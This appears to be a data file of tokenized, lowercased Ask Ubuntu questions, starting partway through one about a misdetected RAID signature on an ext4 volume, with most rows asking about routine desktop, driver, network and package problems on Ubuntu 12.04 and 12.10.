-f /dev/mapper/foo-root without errors . at this point it seems that the problem is that the file system type is reported incorrectly . i run blkid -p /dev/mapper/foo-root and it returns : /dev/mapper/foo-root : version= '' 55.72 '' type= '' jmicron_raid_member '' usage= '' raid '' a healthy ext4 filesystem would return uuid= '' along-uuid '' type= '' ext4 '' . i turn to google . it seems that dmraid could remove the erroneous raid header with dmraid -er but that does not work . also dmraid -r returns : no raid disks for good measure , and a bit of alright-already-fix-it feeling , i try dmraid -x and dmraid -er /dev/mapper/foo-root and neither helps in any way . while accessing the filesystem i have tried various things like chrooting into it and rebuilding the initrd , rewrite grub to mbr ( tried both sdb and sdb1 ) , and making sdb1 bootable , among other things . nothing seems to make the disk bootable again . i am out of options . any help is appreciated . update : running the command from @ psusi comment : 0000000 : 4a4d 4837 780a 4744 5851 7033 4d70 5136 jmh7x.gdxqp3mpq6 0000010 : 6c71 5056 4932 4f31 6c49 7155 7646 6359 lqpvi2o1liquvfcy 0000020 : 414b 382f 7054 766f 5a32 5a57 754c 585a ak8/ptvoz2zwulxz 0000030 : 6e59 7746 5174 4b53 5656 686e 6230 4e4a nywfqtksvvhnb0nj 0000040 : 4646 685a 506b 4155 3936 7335 4d69 2f65 ffhzpkau96s5mi/e 0000050 : 4971 0a67 5346 6a59 4b43 4f2f 536f 5a5a iq.gsfjykco/sozz 0000060 : 4855 3838 7231 2b6c 4137 4558 326c 704d hu88r1+la7ex2lpm 0000070 : 6e6e 6a74 5463 4d63 2b6c 4959 3131 334c nnjttcmc+liy113l 0000080 : 6a6f 4b69 4346 4f56 4a42 3635 4641 4675 jokicfovjb65fafu 0000090 : 4457 626d 312b 5658 4c4b 4f64 7458 4a0a dwbm1+vxlkodtxj . 00000a0 : 4e5a 6136 6841 6b6a 5573 6553 6176 6e30 nza6hakjusesavn0 00000b0 : 735a 2b7a 5637 6f71 6561 564f 3566 6c7a sz+zv7oqeavo5flz 00000c0 : 3655 3458 6855 6373 4b6c 4d70 784a 494c 6u4xhucsklmpxjil 00000d0 : 612f 3152 6a46 6157 3563 3966 4e6b 4f31 a/1rjfaw5c9fnko1 00000e0 : 4150 6331 6f32 3368 6131 6a62 0a66 6653 apc1o23ha1jb.ffs 00000f0 : 2f61 626e 474e 6b66 4559 787a 6e31 4e63 /abngnkfeyxzn1nc 0000100 : 3157 7139 6b61 526a 6255 3339 4a69 314b 1wq9karjbu39ji1k 0000110 : 3632 5765 6e51 4b6c 7567 3373 5742 4148 62wenqklug3swbah 0000120 : 7278 5854 5165 4634 346e 6534 3143 4d33 rxxtqef44ne41cm3 0000130 : 637a 592b 5668 3870 2f0a 4373 7562 5132 czy+vh8p/.csubq2 0000140 : 6847 3675 6470 3455 3850 5875 7132 5631 hg6udp4u8pxuq2v1 0000150 : 465a 324b 7851 4842 5975 4e75 4354 6a49 fz2kxqhbyunuctji 0000160 : 4866 474b 364f 342b 4851 3036 454a 4a4e hfgk6o4+hq06ejjn 0000170 : 4578 5541 6b4b 546a 5070 7a53 5431 4432 exuakktjppzst1d2 0000180 : 6e4b 506e 6730 0a37 5449 6d44 5478 4462 nkpng0.7timdtxdb 0000190 : 7879 514d 6e30 7761 7a5a 2f45 324a 7047 xyqmn0wazz/e2jpg 00001a0 : 4563 7337 6a6e 4c63 4138 6574 4356 7a4a ecs7jnlca8etcvzj 00001b0 : 766e 454c 586e 6957 7868 4639 5038 4132 vnelxniwxhf9p8a2 00001c0 : 645a 2f66 3277 7556 794f 344a 3731 4e59 dz/f2wuvyo4j71ny 00001d0 : 5357 6c0a 696b 7364 6a59 7665 7356 4b6f swl.iksdjyvesvko 00001e0 : 572b 376e 314f 6174 752b 6737 4c59 5732 w+7n1oatu+g7lyw2 00001f0 : 744e 574d 5a6a 765a 3459 5933 7756 696a tnwmzjvz4yy3wvij
249161	ubuntu software update check size is unreasonably large	when i check for updates , i see that it is using my internet at full capacity ( 128kb/s ) for about 3 minutes . that is something like 25mb of data downloaded -- just to know if there are updates for my computer . after that , i still get a window showing me that i can now download those new updates for another 20+mb 's ! do i have something wrong in my settings , or is this normal ?
249162	how to get dash to open folders ?	when i search for a folder in my home directory using the dash , the folder shows up . however , when i click on the folder , nothing happens . how can i get nautilus to launch when i click on the folder ? i had a double nautilus.desktop in ~/.local/share/applications/ which is what was breaking things ! once i deleted it , the problem went away . therefore , this question is not a good question . please vote to close it .
249165	how do i choose m4a format music downloads in the music store ?	the albums in the ubuntu music store are shown to be available as mp3 or m4a files . how can i decide which format to download ? i am not using mac but i would prefer to download m4a .
249166	i ca n't get past the loading screen after attempting to remove amd watermark	i installed graphics card drivers as can be seen here and i ended up with an amd watermark that mentioned `` test use only '' . i followed this tutorial on youtube to remove it . i rebooted and now i ca n't get past the ubuntu loading screen . i 'm using ubuntu 12.04 .
249174	prepend current git branch in terminal	how can i configure the terminal to display the current git branch ? i 'd like to see the second line rather than the first : andy @ bob : ~/my_projects/project_x $ ( master ) ~/my_projects/project_x $ i do n't want to have to run git status to see which branch i am currently on anymore !
249177	why converting a flv file to mp3 i got a bigger file ?	converting a flv music file from youtube to mp3 with audacity i got a bigger file than the initial flv . i guess i have set too big a bit-rate or something like that that has artificially inflated the audio file* . or is this normal ? what is the audio behind a flv ? and what is the proper setting so as to get a sound file that is the one of the `` original '' flv ? [ *using ffmpeg -i *.flv i got some info on the flv audio : stream # 0.1 : audio : aac , 44100 hz , stereo , s16 , 131 kb/s . while the mp3 : mp3 , 44100 hz , stereo , s16 , 320 kb/s ] ( installing ffmpeg and using ffmpeg -i input_file.flv output_file.mp3 i get an mp3 that is half the flv . is this the way ? )
249179	dual monitor with ati	i 'm running 12.04 dual booted on a dell inspiron i17r with an ati 5400 . i 'm trying to get an external monitor ( dell ultrasharp u2412m ) to act as a second display . when i connect it to my computer , it happily mirrors the display , but does so at 1440x900 , not the 1920x1200 i know it 's capable of . i want to disable mirroring , and i want to up the resolution ( i suspect the latter will be easy to take care of once i do the former ) . when i go settings -- > displays and uncheck `` mirror displays '' , i get a dialog box with an error message : the selected configuration for displays could not be applied requested position/size for crtc 148 is outside the allowed limit : position= ( 1600 , 0 ) , size= ( 1440 , 900 ) , maximum= ( 1920 , 1920 ) clicking `` close '' brings up another dialog box which says : failure to apply configuration : % s gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : requested position/size for crtc 148 is outside the allowed limit : position= ( 1600 , 0 ) , size= ( 1440 , 900 ) , maximum= ( 1920 , 1920 ) i 'm aware that this question has already been asked before . following that solution , i try sudo amdcccle but when i select multi-display desktop with display ( s ) 2 and click 'ok ' , my terminal returns the following error messages : ( process:3491 ) : glib-gobject-critical ** : /build/buildd/glib2.0-2.32.3/./gobject/gtype.c:2722 : you forgot to call g_type_init ( ) ( process:3491 ) : glib-critical ** : g_once_init_leave : assertion `result ! = 0 ' failed ( process:3491 ) : glib-gobject-critical ** : /build/buildd/glib2.0-2.32.3/./gobject/gtype.c:2722 : you forgot to call g_type_init ( ) ( process:3491 ) : glib-critical ** : g_once_init_leave : assertion `result ! = 0 ' failed ( process:3491 ) : glib-gobject-critical ** : g_object_new : assertion `g_type_is_object ( object_type ) ' failed and no change occurs . any help would be greatly appreciated .
249180	how do i migrate a virtualbox image to an lxc container ?	is there a way to migrate a virtualbox image to a lxc containter environment ? i can easly extract a tar of the virtualbox vm 's file system . i 'm kind of hoping there 's a way to create an 'empty ' container and then untar the virtualbox vm 's file system into it . i am completely new to lxc but if anyone can lay out the steps i 'll lookup any details . any help on this is appreciated .
249182	ubuntu 12.10 x64 does n't detect ram properly	i have 6 gb installed , which as a 64-bit os , it should see , but it only sees 3.5 gb ! how do i remedy this ? output as requested : seann @ seann : ~ $ dmidecode -- type memory | grep -e `` ( size|maximum.capacity ) '' maximum capacity : 4 gb size : 2048 mb size : 1024 mb size : 2048 mb size : 1024 mb seann @ seann : ~ $ free -m total used free shared buffers cached mem : 3513 3328 185 0 373 2083 -/+ buffers/cache : 870 2642 swap : 3907 4 3903
249187	ubuntu ( 12.10 ) wants to reinstall everytime i boot	i installed ubuntu 12.10 and windows on my computer . however , on booting ubuntu always asks me : '' try ubuntu without installing '' '' install ubuntu '' what 's going on , or what did i do wrong during installation ?
249189	first time ubuntu user/install . i get desktop / mouse . nothing else , problem with unity ?	i installed fresh ( replaced windows ) . i checked the `` update '' and `` third-party '' checkboxes during install . everything going great , i entered my name/password . it seemed to install everything . but then after the first reboot ( it told me it needed to reboot after successful install ) it an error message came up - very non-descript . just asked me if i wanted to send report the error , and then it had another dialog to reboot . i rebooted again , and this time , i just get the desktop . at first i thought it was broken , but i could right click . so i created a folder , then got into the file structure . then i could load some things , firefox , etc . but obviously something went wrong . i know nothing about ubuntu , but i am a pretty smart guy . i guessed that `` unity '' is a big part of ubunuty 's os . so , i found some terminal commands and , well i 'll just paste below what i got and maybe someone ( anyone ? ! ) can help me ! i love ubuntu so far ! fyi - my the pc i am trying to use is a dell optiplex , pentuium 4 @ 2.7 ghz , 512mb ram . http : //pastebin.com/6qmpu8wp you can see there are several unity errors . maybe ubuntu just wi n't work ? : - ( what other linux options do i have to make an old pc , a simple fast web browser ?
249196	what 's the best way to add native-looking links to my ntfs data partition ?	i have many documents , backups , movies , photos which i have in a windows data partition ( d : drive ) that is on the same box as my ubuntu installation . i want to be able to use this from ubuntu , with the directories being accessible in the home directory . for example , in my home directory , the pictures , downloads , documents folders would all point to the ntfs parition : /media/datantfs/pictures /home/can/pictures /media/datantfs/downloads /home/can/downloads /media/datantfs/documents /home/can/documents /media/datantfs/backups /home/can/backups i tried adding /media/datantfs/music /home/can/music none rw , bind to the fstab and it worked . i think a symbolic link could also work . for example , rm -rf ~/music & & ln -s /media/datantfs/music ~/music changing xdg-user-dirs may work too . the drive is already mounted at boot time : uuid=2614a82f14a803c1 /media/datantfs ntfs defaults , umask=007 , gid=46 0 0 also , i 've found out that i can also use ubuntu tweak to do this . given that i 'm new to ubuntu , can someone tell me the recommended way to accomplish this ?
249203	what does `` sudo echo nameserver 8.8.8.8 > /etc/resolv.conf '' do ?	can someone please tell me what sudo echo nameserver 8.8.8.8 > /etc/resolv.conf does ? i used to have random dropping of internet connection for 15 seconds to 3 mins but after using this command , internet connection is working like a charm . i am just curious what this magic command line did .
249205	restore lost files due to power outage ?	i recently had a power outage , and that rolled back my external sata2 ssd 5 days . is this normal ? if not , is there any way to fix this/regain data ? thanks , ccrama
249208	limit access to specific devices with vlc remote ?	i could set up vlc and the host files so that i can use my smartphone as a remote controller for vlc ( through http connection ) . is there a way to limit the remote access only from a specific device , possibly based on the mac address of my smartphone rather than on the ip ? ( android 2.2 does n't allow you to select a static ip for each network , therefore i simply connect to my network using dhcp ) .
249211	how can i let unity webapps always run in chromium ?	under ubuntu 12.10 , whenever i visit a new domain in chromium , a bar appears at the top of the window saying unity webapps needs your permission to run . [ always run on this site ] [ run this time ] . i want unity webapps to work , but i do n't want to be asked this for every single site i visit . how can i stop this notification appearing ?
249215	gwoffice 0.97 has a dependency issue and wo n't install	when trying to install the latest version of gwoffice 0.97 i get : the following packages have unmet dependencies : gwoffice : depends : libgranite1 but it is not installable e : unable to correct problems , you have held broken packages . how do i solve this problem ?
249217	ctrl and shift keys are sticky	i think ubuntu recognized my laptop ( asus u32u ) as a tablet and after the installation i had huge on-screen keyboard . deleted by unistalling via synaptic anything related with virtual keyboard . now i have a bug like when i press ctrl or shift , it remains pressed until i press/click something else ( like in smartphones and tablets ) . not sure about alt . how to deal with it ? inb4 thanks !
249218	fix fonts in chrome ?	after installing and removing kubuntu , some of the fonts in chrome are showing up as times new roman instead of ubuntu font . is there any way to reset the fonts in ubuntu and chrome ? i want to use the ubuntu font everywhere .
249219	how do i create a custom resolution for an external monitor ?	i currently trying to add the resolution 1216x676 for my external monitor which is connected via hdmi-1 . i 'm following the guide found at http : //shanereustle.com/blog/force-screen-resolutions-on-ubuntu.html . here are the commands i 've tried : $ cvt 1216 676 60 output is # 1216x676 59.87 hz ( cvt ) hsync : 42.09 khz ; pclk : 66.00 mhz modeline `` 1216x676_60.00 '' 66.00 1216 1272 1392 1568 676 679 689 703 -hsync +vsync then i try $ xrandr -- newmode `` 1216x676_60.00 '' 66.00 1216 1272 1392 1568 676 679 689 703 -hsync +vsync the output for this command is : x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 37 current serial number in output stream : 37 any help would be appreciated .
249220	open vm tools producing warnings in syslog every 30 seconds / how do i suppress these warnings ?	i would like to adjust my question slightly as i just updated one of my servers from 12.04 to 12.04.1 and am now seeing the same warnings on the upgraded server as well , so i am suspecting there is something with the kernel ( which was upgraded ) or one of the other packages . so since there appears to be a lack of 'resolution ' ( googled for a quite a while to find something ) , can someone tell me how to suppress the warnings for open-vm-tools . -- - [ original question below ] -- - i setup a new server today ( vmware guest ) and noticed in the /var/syslog the following warning entries : ( coming from open-vm-tools ) jan 29 19:20:49 mail01 vmsvc [ 1168 ] : [ warning ] [ guestinfo ] error sending guestmeminfo . jan 29 19:20:49 mail01 vmsvc [ 1168 ] : [ warning ] [ guestinfo ] failed to send vmstats . these warnings are happening every 30 seconds . oddly enough however vmware infrastructure client appears to be showing correct information regardless of the warnings . i have several other servers all running ubuntu 12.04 ( some upgraded from 10.04 even ) that are running open-vm-tools , and none of them are producing this warning . i have googled the error message but have come up with nothing as of yet . any suggestions would be greatly appreciated . i do realize the alternative is to compile and install the tools directly from the server , but i would rather just use a package that has worked on other machines . host : vmware esx server 3i , 3.5.0 , build 207095 ( best i can do an hp proliant dl580 g2 ) guest / os : ubuntu 12.04.1 - 32bit any other information that i can provide , please let me know .
249221	auto login not working	i have ubuntu 12.04 desktop running on my box . i enabled 'auto login ' for my account ( only account on system ) and it has worked just fine before . i usually have it as a headless server . i needed to use the desktop for something but it wo n't let me login . i can ssh to it , use the transmission web gui , webserver and everything else , except at the login screen . when i enter the password , it acts like it 's logging in but then comes right back to the login screen . i tried creating another user and using the auto login for that user and it works fine . any suggestions ?
249222	how do enable wireless and ethenet connection in inspiron 7420 using ubuntu 12.04 ?	i am beginner with ubuntu and recently installed ubuntu 12.04 lts as dual booting with windows 8 . i would like to continue with ubuntu as it is amazing . however i am straggling with internet connection . it could not be connected either the wireless nor the ethernet . please help in this , i have been trying for a week but no way . thanks in advance .
249223	how large a checksum file can md5sum handle ?	i have a large collection of files ( 87.3 gb and 80054 objects ) which i am copying from drive to drive . to make sure everything went well , i have made a checksum file to check with md5sum -c checksums.txt . every time i try this , suddenly lightdm crashes ( at least that 's what i think is happening ) , and i am presented with the login screen . my session is gone . what might cause this ? does md5sum has a limit to how large checksum files or number of files it can handle ? ( limited by system specs ? ) info : checksums.txt is 7.6 mb and has 79281 lines . the destination drive is an external ntfs formatted one . i run ubuntu 12.04
249224	how do i install security updates in ubuntu	i get the following message during a login . how do i install security updates in ubuntu . why am i getting the reboot error . 132 packages can be updated . 68 updates are security updates . get cloud support with ubuntu advantage cloud guest http : //www.ubuntu.com/business/services/cloud *** /dev/xvda1 will be checked for errors at next reboot ***
249225	installing 12.10 via dvd , do n't get install along side windows 7 option ?	do n't want to install via the windows installer . have burned the iso and booted from cd . when i select the option to install , i 'm not getting the option to `` install along side windows 7 '' which the instructions state it should be there . any way to get this to show up ?
249227	ubuntu 12.10/unr wireless thinks network uses wrong security	i have a recently-upgraded unr ( 12.04 ) running on my netbook , and i just built a computer with ubuntu 12.10 . unr had no wireless problems until i upgraded , and now the only way i can connect is by manually choosing the connection every time i turn on my netbook - because trying to connect to the network it detects , it wo n't let me hit `` connect '' unless i add another three characters to the password ! checking `` automatically connect '' on the new version of the connection did n't work to make it connect automatically , and editing the wireless security on the default connection did n't work , either . so now i have this desktop running 12.10 and i 'm running into basically the same issue as the netbook with 12.04 , except i ca n't even manually connect to a new connection to the same network with the right security selected . i 'm fairly certain it 's `` wpa & wpa2 personal '' ( and if it 's not it 's moot since nothing works anyway ) , but it will not let me hit `` connect '' without a thirteen-character password , which is very much wrong . when i try to make another connection with the right security selected , it tries for a while to connect and then asks me for the password in a pop-up box , and then tries for a while to connect and then asks me for the password in a pop-up box , et cetera , ad nauseam . what in the world am i supposed to do ? i have to assume the issue is in the os and not the hardware , since the hardware is totally different on both boxes and the trouble only appeared on my netbook when i upgraded the os . edit : ran iwlist and yes , it is wpa2 and it knows it 's wpa2 ( at least , iwlist knows this ) so i 'm really at a loss .
249228	unable to burn because of medium write error	trying to burn ubuntu 12.10 to memorex dvd+rdl with maxos . seemed to be going well then error message popped up `` unable to burn because of medium write error '' . i 'm hoping this is something very simple i 'm doing wrong . thanks in advance for any help .
249229	certain web pages load slowly	since installing ubuntu 12.04 ( switching from windows , i 'm new to linux and ubuntu ) certain web pages , especially blog type web pages such as boingboing.net or non-blog pages such as offliberty.com , take 10 to 15 minutes to load . this problem occurs in firefox , opera and chromium . as i mentioned , only some web pages are loading slowly , while 90 % of the sites i visit load normally . i have read around and tried fixes such as : sudo dpkg-reconfigure resolvconf this did not solve the problem . here are some specs on my computer : hp pavilion dv6-6100 , 6 gb ram , amd a8-3500m apu with radeon ( tm ) hd graphics ă 4 , ubuntu 12.04 , 64 bit other information plucked from my computer : lspci | grep network : 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) iwconfig : lo no wireless extensions . eth1 ieee 802.11abg essid : '' bill '' mode : managed frequency:2.462 ghz access point : 00:02:6f:60:35 : a0 retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . lsmod : module size used by snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq usb_storage 49198 1 nls_utf8 12557 1 udf 94613 1 crc_itu_t 12707 1 udf btusb 18332 1 vesafb 13844 1 hp_wmi 18092 0 sparse_keymap 13890 1 hp_wmi joydev 17693 0 rfcomm 47604 12 bnep 18281 2 bluetooth 180153 23 btusb , rfcomm , bnep parport_pc 32866 0 ppdev 17113 0 snd_hda_codec_idt 70795 1 snd_hda_codec_hdmi 32474 1 lib80211_crypt_tkip 17390 0 snd_hda_intel 33773 5 snd_hda_codec 127706 3 snd_hda_codec_idt , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec snd_pcm 97275 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec uvcvideo 72627 0 videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev snd_timer 29990 2 snd_seq , snd_pcm wl 3074895 0 psmouse 97485 0 serio_raw 13211 0 snd 79041 20 snd_rawmidi , snd_seq , snd_seq_device , snd_hda_codec_idt , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_timer wmi 19256 1 hp_wmi fglrx 3264017 334 k10temp 13166 0 i2c_piix4 13301 0 cfg80211 205774 1 wl soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm lib80211 14381 2 lib80211_crypt_tkip , wl rts_pstor 445241 0 video 19596 0 hp_accel 25976 0 lis3lv02d 19876 1 hp_accel input_polldev 13896 1 lis3lv02d mac_hid 13253 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp pata_atiixp 13204 0 r8169 62154 0 dmesg | grep eth1 : [ 12.840802 ] eth1 : broadcom bcm4727 802.11 hybrid wireless controller 6.20.155.1 ( r326264 ) [ 59.129120 ] eth1 : ipv6 duplicate address fe80 : :422c : f4ff : fe05:4843 detected ! [ 79.149757 ] eth1 : ipv6 duplicate address fe80 : :422c : f4ff : fe05:4843 detected ! [ 1194.333758 ] eth1 : ipv6 duplicate address fe80 : :422c : f4ff : fe05:4843 detected ! [ 4256.253774 ] error @ wl_notify_scan_status : eth1 scan_results error ( -22 ) [ 4261.361829 ] eth1 : ipv6 duplicate address fe80 : :422c : f4ff : fe05:4843 detected ! [ 11653.834679 ] eth1 : ipv6 duplicate address fe80 : :422c : f4ff : fe05:4843 detected ! [ 14306.067886 ] eth1 : ipv6 duplicate address fe80 : :422c : f4ff : fe05:4843 detected ! [ 22873.379725 ] eth1 : ipv6 duplicate address fe80 : :422c : f4ff : fe05:4843 detected ! lshw -c network : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 06 serial : 10:1f:74:0d:74:7c size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:51 ioport:2000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 01 serial : 40:2c : f4:05:48:43 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=192.168.0.126 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : f0200000-f0203fff i appreciate any help that you are able to provide . thank you . update : tracepath boingboing.net : 1 : cliftonhp.local 0.200ms pmtu 1500 1 : esr7750.esr7750 1.915ms 1 : esr7750.esr7750 1.397ms 2 : no reply 3 : tge7-1.austtxf-er02.texas.rr.com 10.229ms 4 : te0-10-0-2.austtxrdcsc-cr02.texas.rr.com 26.757ms asymm 6 5 : agg22.hstntxl3-cr01.texas.rr.com 36.856ms 6 : ae-4-0.cr0.hou30.tbone.rr.com 24.036ms 7 : ae-0-0.pr0.dfw10.tbone.rr.com 31.194ms 8 : 107.14.16.186 45.024ms 9 : vlan70.csw2.dallas1.level3.net 83.710ms asymm 14 10 : ae-71-71.ebr1.dallas1.level3.net 74.836ms asymm 14 11 : ae-14-14.ebr2.chicago2.level3.net 86.226ms asymm 14 12 : ae-1-100.ebr1.chicago2.level3.net 84.725ms asymm 14 13 : no reply 14 : ae-1-9.bar1.toronto1.level3.net 123.745ms asymm 12 15 : ae-3-3.car1.toronto2.level3.net 142.218ms asymm 13 16 : wbs-connect.car1.toronto2.level3.net 102.478ms asymm 14 17 : te-1-1.dist02.tor1.prioritycolo.com 76.593ms asymm 15 18 : te-1-2.dist01.tor1.prioritycolo.com 124.297ms asymm 12 19 : www.boingboing.net 69.041ms reached resume : pmtu 1500 hops 19 back 243 tracepath offliberty.com : 1 : cliftonhp.local 0.182ms pmtu 1500 1 : esr7750.esr7750 2.246ms 1 : esr7750.esr7750 1.318ms 2 : no reply 3 : tge7-1.austtxf-er01.texas.rr.com 17.715ms 4 : tge0-10-0-3.austtxa-cr01.texas.rr.com 37.409ms asymm 6 5 : agg22.dllatxl3-cr01.texas.rr.com 24.509ms 6 : ae-4-0.cr0.dfw10.tbone.rr.com 45.939ms 7 : 107.14.17.234 25.430ms 8 : 66.109.9.214 24.930ms 9 : ae3.csr2.dal2.gblx.net 23.706ms 10 : dal-2-6k.tx.us 19.514ms 11 : dal-1-6k.tx.us 67.793ms asymm 10 12 : no reply 13 : 198.27.73.203 145.245ms asymm 20 14 : rbx-g1-a9.fr.eu 139.555ms asymm 19 15 : fra-1-6k.de.eu 172.028ms asymm 21 16 : fra-5-6k.fr.eu 176.451ms asymm 20 17 : sbg-g1-a9.fr.eu 163.379ms asymm 19 18 : sbg-3b-6k.fr.eu 175.199ms asymm 20 19 : ns399404.ovh.net 165.966ms reached resume : pmtu 1500 hops 19 back 44 tracepath google.com : 1 : cliftonhp.local 0.203ms pmtu 1500 1 : esr7750.esr7750 1.838ms 1 : esr7750.esr7750 1.318ms 2 : no reply 3 : tge7-1.austtxf-er02.texas.rr.com 26.978ms 4 : te0-10-0-2.austtxrdcsc-cr02.texas.rr.com 42.558ms asymm 6 5 : agg22.hstntxl3-cr01.texas.rr.com 49.949ms 6 : ae-2-0.cr0.hou30.tbone.rr.com 30.256ms 7 : ae-0-0.cr0.dfw10.tbone.rr.com 40.965ms asymm 8 8 : 107.14.17.232 36.290ms asymm 7 9 : no reply 10 : no reply 11 : no reply 12 : no reply 13 : no reply 14 : no reply 15 : no reply 16 : no reply 17 : no reply 18 : no reply 19 : no reply 20 : no reply 21 : no reply 22 : no reply 23 : no reply 24 : no reply 25 : no reply 26 : no reply 27 : no reply 28 : no reply 29 : no reply 30 : no reply 31 : no reply too many hops : pmtu 1500 resume : pmtu 1500 i also included the tracepath for google , which loads quickly . the ping times were not out of the ordinary . i pinged the sites earlier while at work and , if anything , the ping times from this computer were lower than the ping times from my work computer , which loaded both of these pages in under 30 seconds .
249230	how to set up canon imageclass d340 printer on ubuntu 12.10	i am trying to set up a canon imageclass d340 printer connected via usb to an ubuntu 12.10 computer . i was unable to find any ubuntu or linux drivers for it , but i do have the current windows drivers . i tried using ndiswrapper to add a .inf file from the windows driver , but it did not work . i am completely new with using windows drivers on ubuntu , so i do not really know what to do . if i can get the printer to work , i want to be able to share it over lan to all the other networked ubuntu computers .
249234	unresponsive window imprint on the desktop	i have an issue where an unresponsive browser tab leaves an imprint on the desktop even after all windows are minimized or closed . to add to the annoyance it stays on top of all the applications and blocks the view . i know i can get rid of that imprint if i log out and log back in . however , i am curious to know if there are any other ways of clearing the imprint from the desktop . i have tried doing a unity -- replace & with no luck . any ideas ? below is a screenshot of what i am talking about .
249236	how to autodetect screen resolution	i 'm using default ati driver , because x always crash when i use fglrx and fglrx-updates driver when i use randr , the output was : screen 0 : minimum 640 x 400 , current 1280 x 1024 , maximum 1280 x 1024 default connected 1280x1024+0+0 0mm x 0mm 1280x1024 0.0* 1152x864 0.0 1024x768 0.0 800x600 0.0 640x480 0.0 720x400 0.0 but i know that my monitor is wide screen , i just forget what is the maximum resolution 1920x ? ? ? so , how to autodetect my monitor resolution since xrandr failed to do this..
249237	how to search for source packages ?	i can use aptitude to search for packages using a search term . for example , to search for all packages whose name begins with foo : $ aptitude search foo* however , this listing does not include source packages ( package with source code ) . how do i search and list source packages using a search term ?
249240	how do i get hibernation or suspension working on a acer aspire 5742g ?	i have installed ubuntu 12.10 on my acer aspire 5742g recently but i ca n't neither put it to hibernation nor suspend it . if i hibernate it then when i press the power to wake it up , it does n't show anything on the display and i have to force power it down ( by pressing the power for a few seconds ) , and press the power again . even sometimes the same thing happens when i shut down the laptop . i tried tuxonice , without success . as far as i know it 's not a bug in 12.10 . my internal wireless card is not working properly and i am using a usb wireless card . do you think it might be the reason ? any one has an idea how to solve this problem ?
249241	does the latest ubuntu 12.10 security update break graphics drivers ?	i downloaded and ran the 12.10 live cd ( today , 1/29/13 ) and it ran fine , and installed just fine as well . however after installing i let the system update the essential/security updates and now the graphics drivers are broken . the system either boots into a blank orange screen with vertical stripes ( and is entirely unresponsive ) , or it boots into a strange screen where the entire login screen if shifted to the right , so the far right of the screen shows up on the left ( the date/time , gearwheel , etc ) . when i try to log in with the second case it goes to the background screen then goes completely unresponsive , and i 'm unable to pull up a terminal or anything . so my question is , is there something about the latest set of security/essential updates that may break graphics drivers ? and if so , is there anything i can do to fix/resolve it , or prevent it from happening in the future ? i 'm ok with just not updating for now , but i do n't want to never update ubuntu ... my graphics hardware is an amd radeon hd 7570 . i 've installed no additional drivers , and downloaded the updates to a fresh install of 12.10 from the live cd . thanks !
249243	is there anyone who has canon mx435 printer . no driver for linux	there is mac and windows drivers only . i tried that tar.gz file http : //support-au.canon.com.au/contents/au/en/0100412601.html nothing happened . usb cable not connected . trying to print over wifi . how can i use mx435 from ubuntu ?
249245	how do i create a bootable ubuntu usb using trisquel ?	does anyone have experience creating a bootable ubuntu usb from the trisquel os ? i have no access to a windows or os x machine .
249250	nvidia driver installed but no menu , hud , or dash are shown	i have ubuntu 12.10 and i have been very painfully trying to figure out how to install my nvidia drivers . online i read to do this : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get updates sudo apt-get install nvidia-current i did that and restart and now i have no menues , hud , dash or anything , just my desktop wallpaper and a handfull of icons i left on the desktop . how do i fix this ?
249253	libnl1.1-6 /netlink/genl/genl.h no such directory	i 'm trying to compile hostapd , and for that it needs the headerfile genl.h which is supposed to be a part of the libnl1 library ( i searched around , the best i got was a recommendation to update libnl1.1 ) somehow that headerfile is not available on the system anywhere , i checked some include folders and used locate genl.h but got no result .
249256	how do i fix an error in my apt sources list ?	i type sudo sh -c 'echo `` [ some repository ] '' > > /etc/apt/sources.list , but , then i get this message : bash : /etc/apt/sources.list : permission denied` and it does n't work . and now , when i type sudo apt-get update or open the update manager , the system just shows me the error message : e : type ' [ some repository ] ' is not known on line 62 in source list /etc/apt/sources.list e : the list of sources could not be read . ** or : could not initialize the package information how can i fix this ?
249257	how to create/simulate two audio lines/devices ?	i have searched around the internet for answers ; however , i was not successful in locating an answer . what is the best method of simulating two audio devices using pulse audio/alsa/something else ? thank you . edit : for further clarification , i need these audio devices for input and output into teamspeak 3 . this setup will allow me to create a music bot of sorts when i play audio into the line that is the input of teamspeak . this setup is easily achieved through virtual audio cable on windows . thank you .
249258	how do i automate the installation of acroread ?	i would like to install acroread via script without interaction . is there a way to pre-accept the license agreement ?
